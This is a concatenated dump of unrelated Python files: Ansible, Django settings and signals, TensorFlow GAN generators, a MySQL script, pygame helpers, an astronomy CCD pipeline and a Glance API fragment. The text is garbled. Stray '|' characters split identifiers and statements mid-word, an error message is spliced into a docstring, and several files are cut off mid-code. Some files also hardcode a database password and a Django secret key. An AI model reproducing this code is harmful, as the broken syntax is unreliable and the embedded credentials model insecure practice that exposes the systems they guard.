msg='error running kubectl (%s) command: %s' % (' '.join(args), str(exc)))
return out.splitlines()
def _execute_nofail(self, cmd):
args = self.base_cmd + cmd
rc, out, err = self.module.run_command(args)
if rc != 0:
return None
return out.splitlines()
def create(self, check=True, force=True):
if check and self.exists():
return []
cmd = ['apply']
if force:
cmd.append('--force')
if not self.filename:
self.module.fail_json(msg='filename required to create')
cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd)
def replace(self, force=True):
cmd = ['apply']
if force:
cmd.append('--force')
if not self.filename:
self.module.fail_json(msg='filename required to reload')
cmd.append('--filename=' + ','.join(self.filename))
return self._execute(cmd)
def delete(self):
if not self.force and not self.exists():
return []
cmd = ['delete']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required to delete without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all')
if self.force:
cmd.append('--ignore-not-found')
return self._execute(cmd)
def exists(self):
cmd = ['get']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all-namespaces')
cmd.append('--no-headers')
result = self._execute_nofail(cmd)
if not result:
| return False
return True
# TODO: This is currently unused, perhaps convert to 'scale' with a replicas param?
def stop(self):
| if not self.force and not self.exists():
return []
cmd = ['stop']
if self.filename:
cmd.append('--filename=' + ','.join(self.filename))
else:
if not self.resource:
self.module.fail_json(msg='resource required to stop without filename')
cmd.append(self.resource)
if self.name:
cmd.append(self.name)
if self.label:
cmd.append('--selector=' + self.label)
if self.all:
cmd.append('--all')
if self.force:
cmd.append('--ignore-not-found')
return self._execute(cmd)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(),
filename=dict(type='list', aliases=['files', 'file', 'filenames']),
namespace=dict(),
resource=dict(),
label=dict(),
server=dict(),
kubectl=dict(),
force=dict(default=False, type='bool'),
all=dict(default=False, type='bool'),
log_level=dict(default=0, type='int'),
state=dict(default='present', choices=['present', 'absent', 'latest', 'reloaded', 'stopped']),
),
mutually_exclusive=[['filename', 'list']]
)
changed = False
manager = KubeManager(module)
state = module.params.get('state')
if state == 'present':
result = manager.create(check=False)
elif state == 'absent':
result = manager.delete()
elif state == 'reloaded':
result = manager.replace()
elif state == 'stopped':
result = manager.stop()
|
'''
Created on 26/09/2014
@author: javgar119
'''
cluster_list =([Cluster(set([]), 0, 0, 1, 0),
Cluster(set([]), 1, 0, 1, 0)])
cluster_list2 = ([Cluster(set([]), 0, 0, 1, 0),
Cluster(set([]), 1, 0, 1, 0),
Cluster(set([]), 2, 0, 1, 0),
Cluster(set([]), 3, 0, 1, 0),
Cluster(set([]), 4, 0, 1, 0),
Cluster(set([]), 5, 0, 1, 0),
Cluster(set([]), 6, 0, 1, 0),
Cluster(set([ | ]), 7, 0, 1, 0),
Cluster(set([]), 8, 0, 1, 0),
Cluster(set([]), 9, 0, 1, 0),
| Cluster(set([]), 10, 0, 1, 0),
Cluster(set([]), 11, 0, 1, 0),
Cluster(set([]), 12, 0, 1, 0),
Cluster(set([]), 13, 0, 1, 0),
Cluster(set([]), 14, 0, 1, 0),
Cluster(set([]), 15, 0, 1, 0),
Cluster(set([]), 16, 0, 1, 0),
Cluster(set([]), 17, 0, 1, 0),
Cluster(set([]), 18, 0, 1, 0),
Cluster(set([]), 19, 0, 1, 0)])
expected = set([(1.0, 0, 1)])
expected2 = set([(1.0, 9, 10), (1.0, 2, 3), (1.0, 15, 16),
(1.0, 11, 12), (1.0, 13, 14), (1.0, 16, 17),
(1.0, 14, 15), (1.0, 12, 13), (1.0, 4, 5),
(1.0, 18, 19), (1.0, 3, 4), (1.0, 8, 9),
(1.0, 17, 18), (1.0, 6, 7), (1.0, 7, 8),
(1.0, 5, 6), (1.0, 10, 11), (1.0, 0, 1), (1.0, 1, 2)])
cluster_list3 = ([Cluster(set([]), 90.9548590217, -17.089022585, 1, 0),
Cluster(set([]), 90.2536656675, -70.5911544718, 1, 0),
Cluster(set([]), -57.5872347006, 99.7124028905, 1, 0),
Cluster(set([]), -15.9338519877, 5.91547495626, 1, 0),
Cluster(set([]), 19.1869055492, -28.0681513017, 1, 0),
Cluster(set([]), -23.0752410653, -42.1353490324, 1, 0),
Cluster(set([]), -65.1732261872, 19.675582646, 1, 0),
Cluster(set([]), 99.7789872101, -11.2619165604, 1, 0),
Cluster(set([]), -43.3699854405, -94.7349852817, 1, 0),
Cluster(set([]), 48.2281912402, -53.3441788034, 1, 0)])
expected3 = set([(10.5745166749, 0, 7)]) |
from rpitc.io import IO
class TestOut:
def test_init_on(self, gpio):
from rpitc.io.out import Out
out = Out(7, status=IO.ON)
assert out.status == IO.ON
out.off()
def test_set_pin(self, out):
assert out.set_pin(IO.ON) == IO.ON
def test_on(self, out):
out.on()
assert | out.status == IO.ON
def test_off(self, out):
out.off()
assert out.status == IO.OFF
def test_toggle(self, out):
out.off()
out.toggle()
| assert out.status == IO.ON
out.toggle()
assert out.status == IO.OFF
|
import pytest
i | mport watchmaker
@pytest.fixture
def setup_object():
pass
def test_main():
"""Placeholder for tests"""
# Placeholder
assert watchmaker.__version__ == watchmaker.__ | version__
|
import os
import threading
import time
from django.conf import settings
from django.db import connections
from django.dispatch import receiver
from django.test.signals import setting_changed
from django.utils import timezone
from django.utils.functional import empty
# Most setting_changed receivers are supposed to be added below,
# except for cases where the receiver is related to a contrib app.
@receiver(setting_changed)
def clear_cache_handlers(**kwargs):
if kwargs['setting'] == 'CACHES':
from djan | go.core.cache import caches
caches._caches = threading.local()
@receiver(setting_changed)
def update_connections_time_zone(**kwargs):
if kwargs['setting'] == 'TIME_ZONE':
# Reset process time zone
if hasattr(time, 'tzset'):
if kwargs['value']:
os.environ['TZ'] = kwargs['value']
| else:
os.environ.pop('TZ', None)
time.tzset()
# Reset local time zone cache
timezone.get_default_timezone.cache_clear()
# Reset the database connections' time zone
if kwargs['setting'] == 'USE_TZ' and settings.TIME_ZONE != 'UTC':
USE_TZ, TIME_ZONE = kwargs['value'], settings.TIME_ZONE
elif kwargs['setting'] == 'TIME_ZONE' and not settings.USE_TZ:
USE_TZ, TIME_ZONE = settings.USE_TZ, kwargs['value']
else:
# no need to change the database connnections' time zones
return
tz = 'UTC' if USE_TZ else TIME_ZONE
for conn in connections.all():
conn.settings_dict['TIME_ZONE'] = tz
tz_sql = conn.ops.set_time_zone_sql()
if tz_sql:
conn.cursor().execute(tz_sql, [tz])
@receiver(setting_changed)
def clear_serializers_cache(**kwargs):
if kwargs['setting'] == 'SERIALIZATION_MODULES':
from django.core import serializers
serializers._serializers = {}
@receiver(setting_changed)
def language_changed(**kwargs):
if kwargs['setting'] in ['LANGUAGES', 'LANGUAGE_CODE', 'LOCALE_PATHS']:
from django.utils.translation import trans_real
trans_real._default = None
trans_real._active = threading.local()
if kwargs['setting'] in ['LANGUAGES', 'LOCALE_PATHS']:
from django.utils.translation import trans_real
trans_real._translations = {}
trans_real.check_for_language.cache_clear()
@receiver(setting_changed)
def file_storage_changed(**kwargs):
file_storage_settings = [
'DEFAULT_FILE_STORAGE',
'FILE_UPLOAD_DIRECTORY_PERMISSIONS',
'FILE_UPLOAD_PERMISSIONS',
'MEDIA_ROOT',
'MEDIA_URL',
]
if kwargs['setting'] in file_storage_settings:
from django.core.files.storage import default_storage
default_storage._wrapped = empty
@receiver(setting_changed)
def root_urlconf_changed(**kwargs):
if kwargs['setting'] == 'ROOT_URLCONF':
from django.core.urlresolvers import clear_url_caches, set_urlconf
clear_url_caches()
set_urlconf(None)
@receiver(setting_changed)
def static_storage_changed(**kwargs):
if kwargs['setting'] in [
'STATICFILES_STORAGE',
'STATIC_ROOT',
'STATIC_URL',
]:
from django.contrib.staticfiles.storage import staticfiles_storage
staticfiles_storage._wrapped = empty
|
# coding:utf-8
"""
Django settings for turbo project.
Generated by 'django-admin startproject' using Django 1.11.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see | ERROR: type should be string, got "\nhttps://docs.djangoproject.com/en/1.11/ref/settings/\n\"\"\"\n\nimport datetime\nimport os\nimport turbosettings.parameters as parameters\nfrom turbosettings.generate_secret_key import secret_key_from_file\n\n# Build paths inside the project like this: o" | s.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
PROJECT_PATH = os.path.realpath(os.path.dirname(__file__))
USE_X_FORWARDED_HOST = False
FORCE_SCRIPT_NAME = ""
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = secret_key_from_file('secret_key')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'songwriter',
'corsheaders',
'debug_toolbar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
ROOT_URLCONF = 'turbosettings.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': parameters.TEMPLATES_DIRS if parameters.TEMPLATES_DIRS else [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.media',
],
'builtins': [
'django.templatetags.i18n',
'django.contrib.humanize.templatetags.humanize',
'django.contrib.staticfiles.templatetags.staticfiles',
],
},
},
]
WSGI_APPLICATION = 'turbosettings.wsgi.application'
CORS_ORIGIN_WHITELIST = [
'localhost:8080',
'127.0.0.1:8080',
]
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'fr'
TIME_ZONE = "Europe/Paris"
USE_I18N = True
USE_L10N = True
USE_TZ = True
gettext = lambda x: x
LANGUAGES = (
('fr', gettext('Français')),
('en', gettext('English')),
)
LOCALE_PATHS = (
os.path.join(BASE_DIR, 'locale/'),
)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = FORCE_SCRIPT_NAME + "/static/"
STATIC_ROOT = BASE_DIR + '/static/'
STATICFILES_DIRS = parameters.STATICFILES_DIRS if parameters.STATICFILES_DIRS else (
"assets/",
)
FIXTURE_DIRS = (
'fixtures/'
)
MEDIA_URL = '/'
MEDIA_ROOT = BASE_DIR + '/media/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_jwt.authentication.JSONWebTokenAuthentication',
),
}
JWT_AUTH = {
'JWT_SECRET_KEY': secret_key_from_file('secret_key_jwt'),
'JWT_ALLOW_REFRESH': True,
'JWT_EXPIRATION_DELTA': datetime.timedelta(seconds=18000),
}
# For debug toolbar
INTERNAL_IPS = ["127.0.0.1"]
from turbosettings.settings_local import *
|
import tensorflow as tf
from tensorflow.python.keras.layers import Conv2D, Conv2DTranspose, Conv3D, Dense, Reshape
tfgan = tf.contrib.gan
def basic_generator(noise):
"""Simple generator to produce MNIST images.
Args:
noise: A single Tensor representing noise.
Returns:
A generated image in the range [-1, 1].
"""
channels_after_reshape = 256
net = Dense(1024, activation='elu')(noise)
net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net)
net = Reshape([7, 7, channels | _after_reshape])(net)
net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net)
net = Conv | 2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net)
return net
def conditional_generator(inputs):
"""Generator to produce MNIST images.
Args:
inputs: A 2-tuple of Tensors (noise, one_hot_labels).
Returns:
A generated image in the range [-1, 1].
"""
noise, one_hot_labels = inputs
channels_after_reshape = 128
net = Dense(1024, activation='elu')(noise)
net = tfgan.features.condition_tensor_from_onehot(net, one_hot_labels)
net = Dense(7 * 7 * channels_after_reshape, activation='elu')(net)
net = Reshape([7, 7, channels_after_reshape])(net)
net = Conv2DTranspose(64, kernel_size=4, strides=2, padding="same", activation='elu')(net)
net = Conv2DTranspose(32, kernel_size=4, strides=2, padding="same", activation='elu')(net)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(1, kernel_size=4, activation = 'tanh', padding='same')(net)
return net
def encoder_decoder_generator(start_img):
"""
"""
layer1 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(start_img)
layer2 = Conv2D(64, kernel_size=4, strides=2, activation='elu', padding='same')(layer1)
layer3 = Conv2D(64, kernel_size=4, strides=1, activation='elu', padding='same')(layer2)
layer4 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer3)
layer5 = Conv2DTranspose(64, kernel_size=4, strides=2, activation='elu', padding="same")(layer4)
layer6 = Conv2D(64, kernel_size=2, strides=1, activation='elu', padding='same')(layer5)
# Make sure that generator output is in the same range as `inputs`
# ie [-1, 1].
net = Conv2D(3, kernel_size=1, activation = 'tanh', padding='same')(layer6)
return net
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Robin Wen
# Date: 2014-11-18
# Desc: Connect to MySQL using MySQLdb package, and insert test data.
import MySQLdb as mdb
con = mdb.connect(host='10.10.3.121', user='robin', passwd='rob | in89@DBA', db='testdb', unix_socket='/tmp/mysql5173.sock', port=5173)
with con:
cur = con.cursor()
cur.execute("DROP TABLE IF EXISTS Writers")
cur.execute("CREATE TABLE Writers(Id INT PRIMARY KEY AUTO_INCREMENT, \
Name VARCHAR(25))")
cur.execute("INSERT INTO Writers(Name) VALUES('Jack London')")
cur.execute("INSERT INTO Writers(Name) VALUES('Honore de Balzac')")
cur.execute("INSERT INTO Writers(Name) VALUES('Lion Feuchtwanger')")
cur | .execute("INSERT INTO Writers(Name) VALUES('Emile Zola')")
cur.execute("INSERT INTO Writers(Name) VALUES('Truman Capote')")
con.close()
|
#import factorial
#import square
x = int(raw_input("What is 'x'?\n"))
y = int(raw_input("What is y?\n"))
# question0 = str(raw_input("Define a y value? (y/n)\n"))
# if (question0 == "y","Y","yes","Yes"):
# y = int(raw_input("What will 'y' be?\n"))
# elif (y == "n","N","no","No"):
# question2 = str(raw_input("Is y = 10 ok?\n"))
# if (question2 == "y","Y","yes","Yes"):
# y = 10
# elif (question2 == "n","N","no","No"):
# y = int(raw_input("What will 'y' be?\n"))
# else:
# print "Please insert and interger"
# else:
# print "Please insert an interger."
print "Using that information, we can do some mathematical equations."
if x > y: #is not None:
print "x, %d, is greater than y, %d." % (x, y)
elif x == y: #is not None:
print "x, %d, is equal to y, %d." % (x, y)
elif x < y: #is not None:
print "x, %d, is less than y, %d." % (x, y)
elif x is not int:
print "x should be a interger, you put it as %d" % (x)
elif x is None:
print "Please rerun the code."
else:
print "Something went wrong!"
add = (x + y)
sub = (x - y)
mult = | (x * y)
div = (x / y)
rem = (x % y)
xeven = (x % 2 == 0)
xodd = (x % 2 != 0)
yeven = (y % 2 == 0)
yodd = (y % 2 != 0)
# xfact = (factorial(x))
# yfact = (factorial(y))
print "If you add x and y, you'll get %s." % add
print "If you subtract x and y, you'll get %s." % sub
print "If you mul | tiply x and y, you'll get %s." % mult
print "If you divide x and y, you'll get %s, with a remainder of %s." % (div, rem)
if (x % 2 == 0):
print "x is even."
if (x % 2 != 0):
print "x is odd."
if (y % 2 == 0):
print "y is even."
if (y % 2 != 0):
print "y is odd."
print "If you square x, you get %s, and y squared is %s." % ((x^2),(y^2))
print "If you cube x, you get %s, and y cubed is %s." % ((x^3), (y^3))
#print "If you take x factorial, you get %s, and y factorial is %s." % ((xfact), (yfact))
#print "The square root of x is %s, and the square root of y is %s." % (square(x), square(y))
print ""
# from sys import argv
# import random
# value = (1,2,3,4,5,6)
# roll, string = argv
# def choice(roll):
# random.choice(dice)
# return choice
# choice(roll)
# dice = choice(value) |
import pygame
import sys
from psistatsrd.app import App
def create_queue_row(data, config):
mem_graph = create_mem_graph(config)
cpu_graph = create_cpu_graph(config)
scroll_text = []
title = []
if type(data['ipaddr']).__name__ == "list":
scroll_text = scroll_text + data['ipaddr']
else:
scroll_text = [data['ipaddr']]
scroller = create_scroller(scroll_text, config)
row = create_row(config)
row.host = data['hostname']
row.add_drawable('scroller', scroller, App.DRAW_EVENT)
row.add_drawable('cpu', cpu_graph, App.POLL_EVENT)
row.add_drawable('mem', mem_graph, App.POLL_EVENT)
return row
def create_row(config):
row = StatRow(
border_width=int(config['statrow.border_width']),
border_color=config['statrow.border_color'],
height=int(config['statrow.height']),
width=int(config['statrow.width']),
bgcolor=config['statrow.bgcolor'],
title_font_size=int(config['statrow.title_font_size']),
title_font_aa | =config['statrow.title_font_aa'],
title_font=config['statrow.title_font'],
title_color=config['statrow.title_color'],
)
return row
def create_scroller( | scroll_text, config):
s = Scroller(
scroll_speed = float(config['scroller.scroll_speed']),
scroll_delay = int(config['scroller.scroll_delay']),
scroll_pause = int(config['scroller.scroll_pause']),
text_font = config['scroller.font.name'],
text_aa = config['scroller.font.aa'],
text_size = int(config['scroller.font.size']),
width = int(config['scroller.width']),
height = int(config['scroller.height']),
color=config['scroller.color'],
bgcolor=config['scroller.bgcolor'],
text_lines=scroll_text
)
return s
def create_resource_graph(key, config):
g = Graph2(
height=int(config['graph.%s.height' % key]),
width=int(config['graph.%s.width' % key]),
line_width=int(config['graph.%s.line_width' % key]),
color=config['graph.%s.color' % key],
bgcolor=config['graph.%s.bgcolor' % key],
line_aa=config['graph.%s.line_aa' % key]
)
max_color = 'graph.%s.max_color' % key
min_color = 'graph.%s.min_color' % key
if max_color in config:
g.max_color = config[max_color]
if min_color in config:
g.min_color = config[min_color]
return g
def create_cpu_graph(config):
return create_resource_graph('cpu', config)
def create_mem_graph(config):
return create_resource_graph('mem', config)
from psistatsrd.app import App
from psistatsrd.graph2 import Graph2
from psistatsrd.scroller import Scroller
from psistatsrd.statrow import StatRow
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# pipeline.py
# AstroObject
#
# Created by Alexander Rudy on 2012-04-25.
# Copyright 2012 Alexander Rudy. All rights reserved.
#
u"""
Basic CCD Reduction Pipeline written with AstroObject
"""
# Python Imports
import shutil
import os
import collections
# Numpy Imports
import numpy as np
# Package Resources Imports
from pkg_resources import resource_filename
# PyRAF Imports
from pyraf import iraf
from iraf import imred, ccdred
from AstroObject.simulator import Simulator
from AstroObject.simulator import (
optional,
description,
include,
replaces,
depends,
excepts,
collect,
ignore,
help
)
from AstroObject.image import ImageStack
from AstroObject.iraftools import UseIRAFTools
from AstroObject.loggers import logging
ImageStack = UseIRAFTools(ImageStack)
class Pipeline(Simulator):
"""A task manager for the RC Pipeline"""
def __init__(self):
super(Pipeline, self).__init__(commandLine=True,name="Example Pipeline",version="1.0")
self.config.load(resource_filename(__name__,"Defaults.yaml"))
self.config.setFile("Main")
self.config.load()
self.collect()
@ignore #Don't load this method as a stage... it is a helper method used to implement other stages.
def load_type(self,key,stack):
"""Load a specific type of files using a generalized loading procedure"""
if isinstance(self.config[key]["Files"],collections.Sequence):
ReadStates = []
for filename in self.config[key]["Files"]:
ReadStates += stack.read(filename)
self.log.debug("Loaded %s: %s" % (key,filename))
return ReadStates
else:
self.log.error("No %s files are given." % key)
raise IOError("No %s files are given." % key)
def load_bias(self):
"""Loading Raw Bias Frames"""
# Load individual bias frames.
self.bias = ImageStack()
self.load_type("Bias",self.bias)
# Set Header Values for each image.
for frame in self.bias.values():
frame.header.update('IMAGETYP','zero')
self.log.debug("Set IMAGETYP=zero for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=zero for frames %r" % self.bias.list())
def load_dark(self):
"""Loading Dark Frames"""
# Load individual bias frames.
self.dark = ImageStack()
self.load_type("Dark",self.dark)
# Set Header Values for each image.
for frame in self.dark.values():
frame.header.update('IMAGETYP','dark')
self.log.debug("Set IMAGETYP=dark for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=dark for frames %r" % self.dark.list())
def load_flat(self):
"""Loading Dark Frames"""
# Load individual bias frames.
self.flat = ImageStack()
self.load_type("Flat",self.flat)
# Set Header Values for each image.
for frame in self.flat.values():
frame.header.update('IMAGETYP','flat')
self.log.debug("Set IMAGETYP=flat for frame %s" % frame)
self.log.debug("Set Header IMAGETYP=flat for frames %r" % self.dark.list())
@help("Create bias frames from the configured bias list.")
@depends("load-bias") # Declare a dependency on another stage: Method ``load_bias()``.
def create_bias(self):
"""Creating Combined Bias Frame"""
self.log.debug("Running iraf.zerocombine on image list...")
iraf.unlearn(iraf.zerocombine)
iraf.zerocombine(self.bias.iinat(),
output=self.bias.iout("Bias"),
combine=self.config["Bias.Combine"],
ccdtype="zero",
reject=self.config["Bias.Reject"],
scale="none", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
)
self.bias.idone()
@help("Create Dark Frames")
@depends("load-dark")
def create_dark(self):
"""Creating Combined Dark Frame"""
self.log.debug("Running iraf.darkcombine on image list...")
iraf.unlearn(iraf.darkcombine)
iraf.darkcombine(self.dark.iraf.inatfile(),
output=self.dark.iraf.outfile("Dark"),
combine=self.config["Dark.Combine"],
ccdtype="dark",
reject=self.config["Dark.Reject"],
process="no", scale="exposure", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1."
)
self.dark.iraf.done()
@help("Create Flat Frames")
@depends("load-flat")
def create_flat(self):
"""Creating Combined Flat Frame"""
self.log.debug("Runnign iraf.flatcombine on image list...")
iraf.unlearn(iraf.flatcombine)
iraf.flatcombine(self.flat.iraf.inatfile(),
output=self.flat.iraf.outfile("Flat"),
combine=self.config["Flat.Combine"],
ccdtype="flat",
reject=self.config["Flat.Reject"],
scale=self.config["Flat.Scale"],
process="no", subsets="no", nlow=0, nhigh=1, nkeep=1, mclip="yes", lsigma=3.0, hsigma=3.0, rdnoise="0.", gain ="1.")
self.flat.iraf.done()
def load_data(self):
"""Loading Raw Data into the system."""
self.data = ImageS | tack()
self.load_type("Data",self.data)
@include # Set this stage as something to be run with the *all macro.
@depends("create-bias","load-data")
@help("Subtract Bias Frame")
def subtract_bias(self):
"""Subtracting Bias Frame"""
iraf.unlearn( | iraf.ccdproc)
iraf.ccdproc(self.data.iraf.modatfile(),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="yes", darkcor="no", flatcor ="no",
zero=self.bias.iin("Bias"))
self.data.idone()
@include # Set this stage as something to be run with the *all macro.
@depends("create-dark","load-data")
@help("Subtract Dark Frame")
def subtract_dark(self):
"""Subtracting Dark Frame"""
iraf.unlearn(iraf.ccdproc)
iraf.ccdproc(self.data.iraf.modatfile(),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", darkcor="yes", flatcor ="no",
dark=self.dark.iin("Dark"))
self.data.idone()
@include # Set this stage as something to be run with the *all macro.
@depends("create-flat","load-data")
@help("Divide out flat frame")
def divide_flat(self):
"""Dividing by Flat Frame"""
iraf.unlearn(iraf.ccdproc)
iraf.ccdproc(self.data.iraf.inatfile(),
output=self.data.iraf.outatfile(append="-Flat"),
flat=self.flat.iin("Flat"),
ccdtype="", fixpix="no", overscan="no", trim ="no", zerocor="no", flatcor="yes", darkcor ="no")
self.data.iraf.done()
# Since the simulator loads and runs stages in order, this stage will always
# be run last.
@include # Set this stage as something to be run with the *all macro.
@depends("load-data")
def save_file(self):
"""Save the new fits file"""
self.data.write("DataFile.fits",frames=[self.data.framename],clobber=True)
@help("Save Partial Images")
@depends("create-flat","create-dark","create-bias")
def save_partials(self):
"""Saving partial images"""
self.bias.write(frames=["Bias"],filename=self.config["Bias.Master"],clobber=True)
self.dark.write(frames=["Dark"],filename=self.config["Dark.Master"],clobber=True)
self.flat.write(frames=["Flat"],filename=self.config["Flat.Master"],clobber=True)
def main():
pipeline = Pipeline()
pipeline.run()
if __name__ == '__main__':
main()
|
"""
Django settings for todo project.
Generated by 'django-admin startproject' using Django 1.9.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this | : os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirn | ame(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-b9xx8+eul3#8q&c@tv^5e!u66j=a6@377$y^b2q!0a%vj+!ny'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
DJANGO_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
THIRD_PARTY_APPS = []
CUSTOM_APPS = [
'tasks.apps.TasksConfig',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + CUSTOM_APPS
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['todo/templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
|
pace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
policy_check = api_policy.MetadefAPIPolicy(
req.context,
md_resource=namespace_obj,
enforcer=self.policy)
policy_check.delete_metadef_namespace()
# NOTE(abhishekk): This call checks whether user
# has permission to delete the tags or not.
policy_check.delete_metadef_tags()
namespace_obj.delete()
ns_repo.remove_tags(namespace_obj)
except exception.Forbidden as e:
LOG.debug("User not permitted to delete metadata tags "
"within '%s' namespace", namespace)
raise webob.exc.HTTPForbidden(explanation=e.msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.msg)
def delete_properties(self, req, namespace):
ns_repo = self.gateway.get_metadef_namespace_repo(
req.context, authorization_layer=False)
try:
namespace_obj = ns_repo.get(namespace)
except (exception.Forbidden, exception.NotFound):
# NOTE (abhishekk): Returning 404 Not Found as the
# namespace is outside of this user's project
msg = _("Namespace %s not found") % namespace
raise webob.exc.HTTPNotFound(explanation=msg)
try:
# NOTE(abhishekk): This call currently checks whether user
# has permission to delete the namespace or not before deleting
# the objects associated with it.
